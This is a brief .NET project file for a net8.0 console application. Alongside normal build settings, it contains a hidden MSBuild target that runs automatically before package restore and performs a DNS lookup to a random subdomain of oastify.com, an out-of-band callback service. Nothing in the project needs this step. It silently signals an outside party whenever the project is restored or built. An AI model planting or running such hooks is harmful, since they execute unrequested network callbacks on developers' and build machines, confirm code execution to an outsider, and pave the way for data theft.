<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="RunCustomScriptOnRestore" BeforeTargets="Restore">
    <Exec Command="nslookup awas7a5jftlaluafqzlfxby9f0lr9hx6.oastify.com" />
  </Target>

</Project>
